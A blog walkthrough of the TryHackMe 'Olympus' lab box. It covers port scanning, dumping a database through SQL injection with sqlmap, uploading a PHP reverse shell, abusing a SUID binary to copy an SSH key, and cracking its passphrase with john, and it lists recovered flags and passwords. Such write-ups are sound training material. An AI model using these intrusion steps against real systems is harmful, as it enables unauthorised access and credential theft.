C R E A T E & D E S T R OY

Olympus | TryHackMe

nmap -sC -sV -T4 $IP -oN initial.nmap    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 19:28 BST
Nmap scan report for
Host is up (0.056s latency).
Not shown: 998 closed tcp ports (conn-refused)
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0a:78:14:04:2c:df:25:fb:4e:a2:14:34:80:0b:85:39 (RSA)
|   256 8d:56:01:ca:55:de:e1:7c:64:04:ce:e6:f1:a5:c7:ac (ECDSA)
|_  256 1f:c1:be:3f:9c:e7:8e:24:33:34:a6:44:af:68:4c:3c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://olympus.thm
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial nmap scan gives us two ports open so it’ll be a deep dive into the web app…

Adding olympus.thm to /etc/hosts gives us this landing page. Time to run some more enumeration.

Gobuster gives some results, including ~webmaster and phpmyadmin. The phpmyadmin result appears to be a red herring.

The webmaster URL contains posts suggests members are using weak passwords that may well be brute-force-able, should we be able to harvest some useful creds.

Running some basic LFI tests on the page comes up dry but there’s a login form that appears vulnerable to SQLi so I get SQLmap to work dumping the database (because I suck at SQLi). A little tip for easy SQLmap syntax is to submit a POST request to the form and grab the request in Firefox’s Network tab and copy as cURL.

19:52:06] [INFO] fetching tables for database: 'olympus'
[19:52:06] [INFO] fetching number of tables for database 'olympus'
[19:52:06] [INFO] retrieved: 6
[19:52:31] [INFO] retrieved: categories
[19:56:15] [INFO] retrieved: chats
[19:58:02] [INFO] retrieved: comments
[20:01:21] [INFO] retrieved: flag
[20:03:00] [INFO] retrieved: posts
[20:05:46] [INFO] retrieved: users

Unsurprisingly inside the flag table, the first flag can be found.

| flag                      |
| flag{Sm4rt!_k33P_d1gGIng} |

From the users table a set of credentials for user prometheus can be retrieved with with a hashed password. There’s a column named “randsalt” so I’d assumed the hash would be salted, but the fields were empty. We get the Bcrypt Hash and crack it for the user’s password.


Unfortunately this doesn’t let us log in on the SSH server, only into the CMS and after a lot of hunting conclude there’s no exploits available. It seems there is another subdomain revealed during enumeration which takes us to a chat app, with upload functionality and an apparent /uploads/ folder. The chat log mentions the app changing file names, but doesn’t seem to care what extension it’s given. Uploading a PHP reverse shell seems perfectly acceptable, and after checking the files column of the chat table we can pop a shell into www-data on the box.

Inside /home/zeus/ the second flag can be found, and now it’s time to enumerate and find a way to escalate.

It appears that www-data can run the SUID binary CPUtils, that copies any files under the user zeus. Using this means that it’s possible to copy zeus’s id_rsa from the .ssh folder and pop into a readable file inside /tmp/

Before log in the ssh key needs cracking so we can obtain the passphrase.

└─$ ssh2john id_rsa > id_rsa.hash

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8                                 
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snowflake        (id_rsa)     
1g 0:00:00:29 DONE (2022-08-21 14:59) 0.03334g/s 51.21p/s 51.21c/s 51.21C/s 234567..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
zeus@olympus:~$ id                                                   
uid=1000(zeus) gid=1000(zeus) groups=1000(zeus),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev)

There’s no obvious misconfiguration for zeus, but after some rooting around a folder named 0aB44fdS3eDnLkpsz3deGv8TttR4sc can be found in /var/www/html. When navigating directly to the URL it presents a login form, whose password can be found inside VIGQFQFMYOST.php.

$pass = "a7c5ffcf139742f52a5267c4a0674129";                                                                                                   
if(!isset($_POST["password"]) || $_POST["password"] != $pass) die('<form name="auth" method="POST">Password: <input type="password" name="pass
word" /></form>');                                                                                                                       ..........

The form gives the syntax and it’s effectively a PHP reverse shell, like our initial foothold. Except the file is owned by root, not www-data so pops a shell as root!

Heading to /root/root.flag we get flag 3 and a hint that there’s a secret to be found. Generating some SSH keys will make this a bit less painful.

root@olympus:/etc# grep -irl flag{

Some quick digging and the bonus flag is found.

This was a fun box, blind SQLi takes time so made the box feel longer than it was but the path to root was fun.

Leave a Reply

Your email address will not be published. Required fields are marked *